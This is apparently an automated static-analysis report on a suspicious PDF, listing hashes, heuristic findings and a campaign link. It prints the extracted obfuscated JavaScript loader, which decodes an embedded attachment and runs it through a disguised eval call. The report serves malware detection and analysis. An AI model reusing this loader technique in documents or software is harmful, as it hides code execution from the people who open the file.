PDF static analysis report

Static analysis result for SHA-256 d3e88adc352457f5…

SUSPICIOUS

PDF

1.4 KB First seen: 2026-05-04
MD5: 4e5b441884653e1e57faac6e82b68e2d SHA-1: 6aed1f75a28711baf31e287cd57754be1f75f071 SHA-256: d3e88adc352457f5dd676dceeba1e109c5602667fab822141200b75c8958b81a
54 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);